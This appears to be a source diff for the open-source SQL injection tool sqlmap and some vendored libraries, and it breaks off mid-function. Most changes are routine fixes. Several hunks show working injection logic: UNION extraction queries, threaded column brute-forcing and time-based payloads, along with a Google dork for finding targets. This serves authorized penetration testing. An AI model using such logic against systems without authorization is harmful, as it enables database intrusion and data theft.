found = True
|
||||
cookie = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)
|
||||
cookie = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), cookie)
|
||||
|
||||
if not found:
|
||||
if post is not None:
|
||||
@@ -1449,13 +1449,13 @@ class Connect(object):
|
||||
match = re.search(r"['\"]", post)
|
||||
if match:
|
||||
quote = match.group(0)
|
||||
post = re.sub(r"\}\Z", "%s%s}" % (',' if re.search(r"\w", post) else "", "%s%s%s:%s" % (quote, name, quote, value if value.isdigit() else "%s%s%s" % (quote, value, quote))), post)
|
||||
post = re.sub(r"\}\Z", "%s%s}" % (',' if re.search(r"\w", post) else "", "%s%s%s:%s" % (quote, name, quote, entry if entry.isdigit() else "%s%s%s" % (quote, entry, quote))), post)
|
||||
else:
|
||||
post += "%s%s=%s" % (delimiter, name, value)
|
||||
post += "%s%s=%s" % (delimiter, name, entry)
|
||||
elif get is not None:
|
||||
get += "%s%s=%s" % (delimiter, name, value)
|
||||
get += "%s%s=%s" % (delimiter, name, entry)
|
||||
elif cookie is not None:
|
||||
cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value)
|
||||
cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, entry)
|
||||
|
||||
if not conf.skipUrlEncode:
|
||||
get = urlencode(get, limit=True)
|
||||
@@ -1482,8 +1482,8 @@ class Connect(object):
|
||||
dataToStdout(warnMsg)
|
||||
|
||||
while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:
|
||||
value = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload
|
||||
Connect.queryPage(value=value, content=True, raise404=False)
|
||||
_ = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload
|
||||
Connect.queryPage(value=_, content=True, raise404=False)
|
||||
dataToStdout('.')
|
||||
|
||||
dataToStdout(" (done)\n")
|
||||
|
||||
@@ -80,7 +80,7 @@ class HTTPSConnection(_http_client.HTTPSConnection):
|
||||
# Reference(s): https://askubuntu.com/a/1263098
|
||||
# https://askubuntu.com/a/1250807
|
||||
_contexts[protocol].set_ciphers("DEFAULT@SECLEVEL=1")
|
||||
except ssl.SSLError:
|
||||
except (ssl.SSLError, AttributeError):
|
||||
pass
|
||||
result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host if re.search(r"\A[\d.]+\Z", self.host or "") is None else None)
|
||||
if result:
|
||||
|
||||
@@ -204,7 +204,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
|
||||
if limitCond:
|
||||
test = True
|
||||
|
||||
if not stopLimit or stopLimit <= 1:
|
||||
if stopLimit is None or stopLimit <= 1:
|
||||
if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]):
|
||||
test = False
|
||||
|
||||
|
||||
@@ -196,7 +196,7 @@ class Metasploit(object):
|
||||
|
||||
if Backend.isDbms(DBMS.MYSQL):
|
||||
debugMsg = "by default MySQL on Windows runs as SYSTEM "
|
||||
debugMsg += "user, it is likely that the the VNC "
|
||||
debugMsg += "user, it is likely that the VNC "
|
||||
debugMsg += "injection will be successful"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
|
||||
@@ -37,6 +37,7 @@ from lib.core.common import singleTimeWarnMessage
|
||||
from lib.core.common import unArrayizeValue
|
||||
from lib.core.common import wasLastResponseDBMSError
|
||||
from lib.core.compat import xrange
|
||||
from lib.core.convert import decodeBase64
|
||||
from lib.core.convert import getUnicode
|
||||
from lib.core.convert import htmlUnescape
|
||||
from lib.core.data import conf
|
||||
@@ -126,6 +127,9 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
|
||||
try:
|
||||
retVal = ""
|
||||
for row in json.loads(output):
|
||||
# NOTE: for cases with automatic MySQL Base64 encoding of JSON array values, like: ["base64:type15:MQ=="]
|
||||
for match in re.finditer(r"base64:type\d+:([^ ]+)", row):
|
||||
row = row.replace(match.group(0), decodeBase64(match.group(1), binary=False))
|
||||
retVal += "%s%s%s" % (kb.chars.start, row, kb.chars.stop)
|
||||
except:
|
||||
retVal = None
|
||||
@@ -254,10 +258,10 @@ def unionUse(expression, unpack=True, dump=False):

if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial, conf.disableJson)):
match = re.search(r"SELECT\s*(.+?)\bFROM", expression, re.I)
if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not re.search(r"\b(MIN|MAX|COUNT)\(", expression):
if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not re.search(r"\b(MIN|MAX|COUNT|EXISTS)\(", expression):
kb.jsonAggMode = True
if Backend.isDbms(DBMS.MYSQL):
query = expression.replace(expressionFields, "CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (kb.chars.start, kb.chars.delimiter, expressionFields, kb.chars.stop), 1)
query = expression.replace(expressionFields, "CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (kb.chars.start, kb.chars.delimiter, ','.join(agent.nullAndCastField(field) for field in expressionFieldsList), kb.chars.stop), 1)
elif Backend.isDbms(DBMS.ORACLE):
query = expression.replace(expressionFields, "'%s'||JSON_ARRAYAGG(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1)
elif Backend.isDbms(DBMS.SQLITE):
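The hunk above wraps the selected fields in JSON_ARRAYAGG() so an entire result set can be aggregated into one UNION-retrievable value. A rough sketch of how such a MySQL query string is assembled (markers and field list are made up, and the real code additionally NULL-casts each field):

    # Aggregate all rows into a single JSON array so one UNION request can
    # carry the whole result set between the start/stop markers.
    start, stop, delim = "qxqzq", "qkqpq", "qhqjq"
    fields = "name,surname"

    expression = "SELECT %s FROM users" % fields
    query = expression.replace(
        fields,
        "CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (start, delim, fields, stop),
        1)
    print(query)
    # SELECT CONCAT('qxqzq',JSON_ARRAYAGG(CONCAT_WS('qhqjq',name,surname)),'qkqpq') FROM users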
|
||||
|
||||
@@ -228,93 +228,95 @@ def columnExists(columnFile, regex=None):
|
||||
columns.extend(_addPageTextWords())
|
||||
columns = filterListValue(columns, regex)
|
||||
|
||||
table = safeSQLIdentificatorNaming(conf.tbl, True)
|
||||
for table in conf.tbl.split(','):
|
||||
table = safeSQLIdentificatorNaming(table, True)
|
||||
|
||||
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
|
||||
table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table)
|
||||
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
|
||||
table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table)
|
||||
|
||||
kb.threadContinue = True
|
||||
kb.bruteMode = True
|
||||
kb.threadContinue = True
|
||||
kb.bruteMode = True
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
threadData.shared.count = 0
|
||||
threadData.shared.limit = len(columns)
|
||||
threadData.shared.files = []
|
||||
|
||||
def columnExistsThread():
|
||||
threadData = getCurrentThreadData()
|
||||
threadData.shared.count = 0
|
||||
threadData.shared.limit = len(columns)
|
||||
threadData.shared.files = []
|
||||
|
||||
while kb.threadContinue:
|
||||
kb.locks.count.acquire()
|
||||
if threadData.shared.count < threadData.shared.limit:
|
||||
column = safeSQLIdentificatorNaming(columns[threadData.shared.count])
|
||||
threadData.shared.count += 1
|
||||
kb.locks.count.release()
|
||||
else:
|
||||
kb.locks.count.release()
|
||||
break
|
||||
def columnExistsThread():
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
if Backend.isDbms(DBMS.MCKOI):
|
||||
result = inject.checkBooleanExpression(safeStringFormat("0<(SELECT COUNT(%s) FROM %s)", (column, table)))
|
||||
else:
|
||||
result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table)))
|
||||
while kb.threadContinue:
|
||||
kb.locks.count.acquire()
|
||||
|
||||
kb.locks.io.acquire()
|
||||
if threadData.shared.count < threadData.shared.limit:
|
||||
column = safeSQLIdentificatorNaming(columns[threadData.shared.count])
|
||||
threadData.shared.count += 1
|
||||
kb.locks.count.release()
|
||||
else:
|
||||
kb.locks.count.release()
|
||||
break
|
||||
|
||||
if result:
|
||||
threadData.shared.files.append(column)
|
||||
if Backend.isDbms(DBMS.MCKOI):
|
||||
result = inject.checkBooleanExpression(safeStringFormat("0<(SELECT COUNT(%s) FROM %s)", (column, table)))
|
||||
else:
|
||||
result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table)))
|
||||
|
||||
if conf.verbose in (1, 2) and not conf.api:
|
||||
clearConsoleLine(True)
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
|
||||
dataToStdout(infoMsg, True)
|
||||
kb.locks.io.acquire()
|
||||
|
||||
if conf.verbose in (1, 2):
|
||||
status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
|
||||
dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
|
||||
if result:
|
||||
threadData.shared.files.append(column)
|
||||
|
||||
kb.locks.io.release()
|
||||
if conf.verbose in (1, 2) and not conf.api:
|
||||
clearConsoleLine(True)
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
|
||||
dataToStdout(infoMsg, True)
|
||||
|
||||
try:
|
||||
runThreads(conf.threads, columnExistsThread, threadChoice=True)
|
||||
except KeyboardInterrupt:
|
||||
warnMsg = "user aborted during column existence "
|
||||
warnMsg += "check. sqlmap will display partial output"
|
||||
logger.warning(warnMsg)
|
||||
finally:
|
||||
kb.bruteMode = False
|
||||
if conf.verbose in (1, 2):
|
||||
status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
|
||||
dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
|
||||
|
||||
clearConsoleLine(True)
|
||||
dataToStdout("\n")
|
||||
kb.locks.io.release()
|
||||
|
||||
if not threadData.shared.files:
|
||||
warnMsg = "no column(s) found"
|
||||
logger.warning(warnMsg)
|
||||
else:
|
||||
columns = {}
|
||||
try:
|
||||
runThreads(conf.threads, columnExistsThread, threadChoice=True)
|
||||
except KeyboardInterrupt:
|
||||
warnMsg = "user aborted during column existence "
|
||||
warnMsg += "check. sqlmap will display partial output"
|
||||
logger.warning(warnMsg)
|
||||
finally:
|
||||
kb.bruteMode = False
|
||||
|
||||
for column in threadData.shared.files:
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
|
||||
result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column)))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE,):
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')", (column, table, column)))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MCKOI,):
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("0=(SELECT MAX(%s)-MAX(%s) FROM %s)", (column, column, table)))
|
||||
else:
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))
|
||||
clearConsoleLine(True)
|
||||
dataToStdout("\n")
|
||||
|
||||
if result:
|
||||
columns[column] = "numeric"
|
||||
else:
|
||||
columns[column] = "non-numeric"
|
||||
if not threadData.shared.files:
|
||||
warnMsg = "no column(s) found"
|
||||
logger.warning(warnMsg)
|
||||
else:
|
||||
columns = {}
|
||||
|
||||
kb.data.cachedColumns[conf.db] = {conf.tbl: columns}
|
||||
for column in threadData.shared.files:
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
|
||||
result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column)))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE,):
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')", (column, table, column)))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MCKOI,):
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("0=(SELECT MAX(%s)-MAX(%s) FROM %s)", (column, column, table)))
|
||||
else:
|
||||
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))
|
||||
|
||||
for _ in ((conf.db, conf.tbl, item[0], item[1]) for item in columns.items()):
|
||||
if _ not in kb.brute.columns:
|
||||
kb.brute.columns.append(_)
|
||||
if result:
|
||||
columns[column] = "numeric"
|
||||
else:
|
||||
columns[column] = "non-numeric"
|
||||
|
||||
hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True)
|
||||
kb.data.cachedColumns[conf.db] = {table: columns}
|
||||
|
||||
for _ in ((conf.db, table, item[0], item[1]) for item in columns.items()):
|
||||
if _ not in kb.brute.columns:
|
||||
kb.brute.columns.append(_)
|
||||
|
||||
hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True)
|
||||
|
||||
return kb.data.cachedColumns
|
||||
|
||||
|
||||
@@ -77,7 +77,7 @@ class Fingerprint(GenericFingerprint):
|
||||
|
||||
if not result:
|
||||
warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE
|
||||
logger.warn(warnMsg)
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return False
|
||||
|
||||
@@ -86,6 +86,6 @@ class Fingerprint(GenericFingerprint):
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE
|
||||
logger.warn(warnMsg)
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return False
|
||||
|
||||
@@ -45,10 +45,12 @@ class Fingerprint(GenericFingerprint):
|
||||
# Reference: https://dev.mysql.com/doc/relnotes/mysql/<major>.<minor>/en/
|
||||
|
||||
versions = (
|
||||
(80300, 80302), # MySQL 8.3
|
||||
(80200, 80202), # MySQL 8.2
|
||||
(80100, 80102), # MySQL 8.1
|
||||
(80000, 80035), # MySQL 8.0
|
||||
(80000, 80037), # MySQL 8.0
|
||||
(60000, 60014), # MySQL 6.0
|
||||
(50700, 50744), # MySQL 5.7
|
||||
(50700, 50745), # MySQL 5.7
|
||||
(50600, 50652), # MySQL 5.6
|
||||
(50500, 50563), # MySQL 5.5
|
||||
(50400, 50404), # MySQL 5.4
|
||||
|
||||
@@ -33,8 +33,8 @@ class Connector(GenericConnector):

def connect(self):
self.initConnection()
self.__dsn = cx_Oracle.makedsn(self.hostname, self.port, self.db)
self.__dsn = getText(self.__dsn)
# Reference: https://cx-oracle.readthedocs.io/en/latest/user_guide/connection_handling.html
self.__dsn = "%s:%d/%s" % (self.hostname, self.port, self.db)
self.user = getText(self.user)
self.password = getText(self.password)
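The connector change above drops cx_Oracle.makedsn() in favour of a plain EZ Connect string. A tiny sketch of that DSN format (host, port and service name are made up):

    # Build an EZ Connect "host:port/service" DSN instead of calling makedsn().
    hostname, port, db = "192.168.1.10", 1521, "XE"
    dsn = "%s:%d/%s" % (hostname, port, db)
    print(dsn)  # 192.168.1.10:1521/XE
    # A connection would then be opened roughly as:
    #   connection = cx_Oracle.connect(user, password, dsn)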
|
||||
|
||||
|
||||
@@ -13,7 +13,10 @@ import sys
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import getSQLSnippet
|
||||
from lib.core.common import isListLike
|
||||
from lib.core.common import isStackingAvailable
|
||||
from lib.core.common import joinValue
|
||||
from lib.core.compat import xrange
|
||||
from lib.core.convert import getUnicode
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import logger
|
||||
@@ -41,6 +44,7 @@ class Custom(object):
|
||||
sqlType = None
|
||||
query = query.rstrip(';')
|
||||
|
||||
|
||||
try:
|
||||
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
|
||||
for sqlStatement in sqlStatements:
|
||||
@@ -61,6 +65,11 @@ class Custom(object):
|
||||
|
||||
output = inject.getValue(query, fromUser=True)
|
||||
|
||||
if sqlType and "SELECT" in sqlType and isListLike(output):
|
||||
for i in xrange(len(output)):
|
||||
if isListLike(output[i]):
|
||||
output[i] = joinValue(output[i])
|
||||
|
||||
return output
|
||||
elif not isStackingAvailable() and not conf.direct:
|
||||
warnMsg = "execution of non-query SQL statements is only "
|
||||
|
||||
@@ -325,7 +325,7 @@ class Databases(object):
|
||||
|
||||
if not isNoneValue(table):
|
||||
db = safeSQLIdentificatorNaming(db)
|
||||
table = safeSQLIdentificatorNaming(table, True)
|
||||
table = safeSQLIdentificatorNaming(table, True).strip()
|
||||
|
||||
if conf.getComments:
|
||||
_ = queries[Backend.getIdentifiedDbms()].table_comment
|
||||
@@ -948,7 +948,7 @@ class Databases(object):
|
||||
self.getTables()
|
||||
|
||||
infoMsg = "fetched tables: "
|
||||
infoMsg += ", ".join(["%s" % ", ".join("'%s%s%s'" % (unsafeSQLIdentificatorNaming(db), ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) for _ in tbl) for db, tbl in kb.data.cachedTables.items()])
|
||||
infoMsg += ", ".join(["%s" % ", ".join("'%s%s%s'" % (unsafeSQLIdentificatorNaming(db), ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) if db else "'%s'" % unsafeSQLIdentificatorNaming(_) for _ in tbl) for db, tbl in kb.data.cachedTables.items()])
|
||||
logger.info(infoMsg)
|
||||
|
||||
for db, tables in kb.data.cachedTables.items():
|
||||
|
||||
@@ -115,7 +115,7 @@ class Entries(object):
|
||||
if kb.dumpKeyboardInterrupt:
|
||||
break
|
||||
|
||||
if conf.exclude and re.search(conf.exclude, tbl, re.I) is not None:
|
||||
if conf.exclude and re.search(conf.exclude, unsafeSQLIdentificatorNaming(tbl), re.I) is not None:
|
||||
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
||||
singleTimeLogMessage(infoMsg)
|
||||
continue
|
||||
@@ -134,12 +134,14 @@ class Entries(object):
|
||||
kb.dumpTable = "%s:%s" % (conf.db, tbl)
|
||||
elif Backend.isDbms(DBMS.SQLITE):
|
||||
kb.dumpTable = tbl
|
||||
elif METADB_SUFFIX.upper() in conf.db.upper():
|
||||
kb.dumpTable = tbl
|
||||
else:
|
||||
kb.dumpTable = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:
|
||||
warnMsg = "unable to enumerate the columns for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
||||
if METADB_SUFFIX not in conf.db:
|
||||
if METADB_SUFFIX.upper() not in conf.db.upper():
|
||||
warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
||||
warnMsg += ", skipping" if len(tblList) > 1 else ""
|
||||
logger.warning(warnMsg)
|
||||
@@ -154,7 +156,7 @@ class Entries(object):
|
||||
|
||||
if not colList:
|
||||
warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
||||
if METADB_SUFFIX not in conf.db:
|
||||
if METADB_SUFFIX.upper() not in conf.db.upper():
|
||||
warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
||||
warnMsg += " (no usable column names)"
|
||||
logger.warning(warnMsg)
|
||||
@@ -168,7 +170,7 @@ class Entries(object):
|
||||
if conf.col:
|
||||
infoMsg += " of column(s) '%s'" % colNames
|
||||
infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
||||
if METADB_SUFFIX not in conf.db:
|
||||
if METADB_SUFFIX.upper() not in conf.db.upper():
|
||||
infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
||||
logger.info(infoMsg)
|
||||
|
||||
|
||||
@@ -27,8 +27,8 @@ requestFile =
|
||||
|
||||
# Rather than providing a target URL, let Google return target
|
||||
# hosts as result of your Google dork expression. For a list of Google
|
||||
# dorks see Johnny Long Google Hacking Database at
|
||||
# http://johnny.ihackstuff.com/ghdb.php.
|
||||
# dorks see Google Hacking Database at
|
||||
# https://www.exploit-db.com/google-hacking-database
|
||||
# Example: +ext:php +inurl:"&id=" +intext:"powered by "
|
||||
googleDork =
|
||||
|
||||
|
||||
@@ -437,7 +437,7 @@ def main():
|
||||
raise SystemExit
|
||||
|
||||
elif any(_ in errMsg for _ in (": 9.9.9#",)):
|
||||
errMsg = "LOL :)"
|
||||
errMsg = "LOL xD"
|
||||
logger.critical(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
|
||||
@@ -98,7 +98,7 @@ def main():
|
||||
apiparser.add_argument("-s", "--server", help="Run as a REST-JSON API server", action="store_true")
|
||||
apiparser.add_argument("-c", "--client", help="Run as a REST-JSON API client", action="store_true")
|
||||
apiparser.add_argument("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS)
|
||||
apiparser.add_argument("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type=int)
|
||||
apiparser.add_argument("-p", "--port", help="Port of the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type=int)
|
||||
apiparser.add_argument("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER)
|
||||
apiparser.add_argument("--database", help="Set IPC database filepath (optional)")
|
||||
apiparser.add_argument("--username", help="Basic authentication username (optional)")
|
||||
|
||||
2 thirdparty/beautifulsoup/__init__.py (vendored)
@@ -16,7 +16,7 @@
|
||||
# disclaimer in the documentation and/or other materials provided
|
||||
# with the distribution.
|
||||
#
|
||||
# * Neither the name of the the Beautiful Soup Consortium and All
|
||||
# * Neither the name of the Beautiful Soup Consortium and All
|
||||
# Night Kosher Bakery nor the names of its contributors may be
|
||||
# used to endorse or promote products derived from this software
|
||||
# without specific prior written permission.
|
||||
|
||||
10 thirdparty/beautifulsoup/beautifulsoup.py (vendored)
@@ -58,7 +58,7 @@ met:
|
||||
disclaimer in the documentation and/or other materials provided
|
||||
with the distribution.
|
||||
|
||||
* Neither the name of the the Beautiful Soup Consortium and All
|
||||
* Neither the name of the Beautiful Soup Consortium and All
|
||||
Night Kosher Bakery nor the names of its contributors may be
|
||||
used to endorse or promote products derived from this software
|
||||
without specific prior written permission.
|
||||
@@ -80,7 +80,7 @@ from __future__ import generators
|
||||
from __future__ import print_function
|
||||
|
||||
__author__ = "Leonard Richardson (leonardr@segfault.org)"
|
||||
__version__ = "3.2.1"
|
||||
__version__ = "3.2.1b"
|
||||
__copyright__ = "Copyright (c) 2004-2012 Leonard Richardson"
|
||||
__license__ = "New-style BSD"
|
||||
|
||||
@@ -93,14 +93,16 @@ if sys.version_info >= (3, 0):
|
||||
text_type = str
|
||||
binary_type = bytes
|
||||
basestring = str
|
||||
unichr = chr
|
||||
else:
|
||||
text_type = unicode
|
||||
binary_type = str
|
||||
|
||||
try:
|
||||
from htmlentitydefs import name2codepoint
|
||||
from html.entities import name2codepoint
|
||||
except ImportError:
|
||||
name2codepoint = {}
|
||||
from htmlentitydefs import name2codepoint
|
||||
|
||||
try:
|
||||
set
|
||||
except NameError:
|
||||
|
||||
424 thirdparty/bottle/bottle.py (vendored)
@@ -69,7 +69,7 @@ if __name__ == '__main__':
|
||||
# Imports and Python 2/3 unification ##########################################
|
||||
###############################################################################
|
||||
|
||||
import base64, calendar, cgi, email.utils, functools, hmac, itertools,\
|
||||
import base64, calendar, email.utils, functools, hmac, itertools,\
|
||||
mimetypes, os, re, tempfile, threading, time, warnings, weakref, hashlib
|
||||
|
||||
from types import FunctionType
|
||||
@@ -94,6 +94,7 @@ if py3k:
|
||||
from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote
|
||||
urlunquote = functools.partial(urlunquote, encoding='latin1')
|
||||
from http.cookies import SimpleCookie, Morsel, CookieError
|
||||
from collections import defaultdict
|
||||
from collections.abc import MutableMapping as DictMixin
|
||||
from types import ModuleType as new_module
|
||||
import pickle
|
||||
@@ -126,7 +127,7 @@ else: # 2.x
|
||||
from imp import new_module
|
||||
from StringIO import StringIO as BytesIO
|
||||
import ConfigParser as configparser
|
||||
from collections import MutableMapping as DictMixin
|
||||
from collections import MutableMapping as DictMixin, defaultdict
|
||||
from inspect import getargspec
|
||||
|
||||
unicode = unicode
|
||||
@@ -1137,6 +1138,399 @@ class Bottle(object):
|
||||
# HTTP and WSGI Tools ##########################################################
|
||||
###############################################################################
|
||||
|
||||
# Multipart parsing stuff
|
||||
|
||||
class StopMarkupException(BottleException):
|
||||
pass
|
||||
|
||||
|
||||
HYPHEN = tob('-')
|
||||
CR = tob('\r')
|
||||
LF = tob('\n')
|
||||
CRLF = CR + LF
|
||||
LFCRLF = LF + CR + LF
|
||||
HYPHENx2 = HYPHEN * 2
|
||||
CRLFx2 = CRLF * 2
|
||||
CRLF_LEN = len(CRLF)
|
||||
CRLFx2_LEN = len(CRLFx2)
|
||||
|
||||
MULTIPART_BOUNDARY_PATT = re.compile(r'^multipart/.+?boundary=(.+?)(;|$)')
|
||||
|
||||
class MPHeadersEaeter:
|
||||
end_headers_patt = re.compile(tob(r'(\r\n\r\n)|(\r(\n\r?)?)$'))
|
||||
|
||||
def __init__(self):
|
||||
self.headers_end_expected = None
|
||||
self.eat_meth = self._eat_first_crlf_or_last_hyphens
|
||||
self._meth_map = {
|
||||
CR: self._eat_lf,
|
||||
HYPHEN: self._eat_last_hyphen
|
||||
}
|
||||
self.stopped = False
|
||||
|
||||
def eat(self, chunk, base):
|
||||
pos = self.eat_meth(chunk, base)
|
||||
if pos is None: return
|
||||
if self.eat_meth != self._eat_headers:
|
||||
if self.stopped:
|
||||
raise StopMarkupException()
|
||||
base = pos
|
||||
self.eat_meth = self._eat_headers
|
||||
return self.eat(chunk, base)
|
||||
# found headers section end, reset eater
|
||||
self.eat_meth = self._eat_first_crlf_or_last_hyphens
|
||||
return pos
|
||||
|
||||
def _eat_last_hyphen(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 2]
|
||||
if not chunk_start: return
|
||||
if chunk_start == HYPHEN:
|
||||
self.stopped = True
|
||||
return base + 1
|
||||
raise HTTPError(422, 'Last hyphen was expected, got (first 2 symbols slice): %s' % chunk_start)
|
||||
|
||||
def _eat_lf(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 1]
|
||||
if not chunk_start: return
|
||||
if chunk_start == LF: return base + 1
|
||||
invalid_sequence = CR + chunk_start
|
||||
raise HTTPError(422, 'Malformed headers, found invalid sequence: %s' % invalid_sequence)
|
||||
|
||||
def _eat_first_crlf_or_last_hyphens(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 2]
|
||||
if not chunk_start: return
|
||||
if chunk_start == CRLF: return base + 2
|
||||
if len(chunk_start) == 1:
|
||||
self.eat_meth = self._meth_map.get(chunk_start)
|
||||
elif chunk_start == HYPHENx2:
|
||||
self.stopped = True
|
||||
return base + 2
|
||||
if self.eat_meth is None:
|
||||
raise HTTPError(422, 'Malformed headers, invalid section start: %s' % chunk_start)
|
||||
|
||||
def _eat_headers(self, chunk, base):
|
||||
expected = self.headers_end_expected
|
||||
if expected is not None:
|
||||
expected_len = len(expected)
|
||||
chunk_start = chunk[base:expected_len]
|
||||
if chunk_start == expected:
|
||||
self.headers_end_expected = None
|
||||
return base + expected_len - CRLFx2_LEN
|
||||
chunk_start_len = len(chunk_start)
|
||||
if not chunk_start_len: return
|
||||
if chunk_start_len < expected_len:
|
||||
if expected.startswith(chunk_start):
|
||||
self.headers_end_expected = expected[chunk_start_len:]
|
||||
return
|
||||
self.headers_end_expected = None
|
||||
if expected == LF: # we saw CRLFCR
|
||||
invalid_sequence = CR + chunk_start[0:1]
|
||||
# NOTE we don not catch all CRLF-malformed errors, but only obvious ones
|
||||
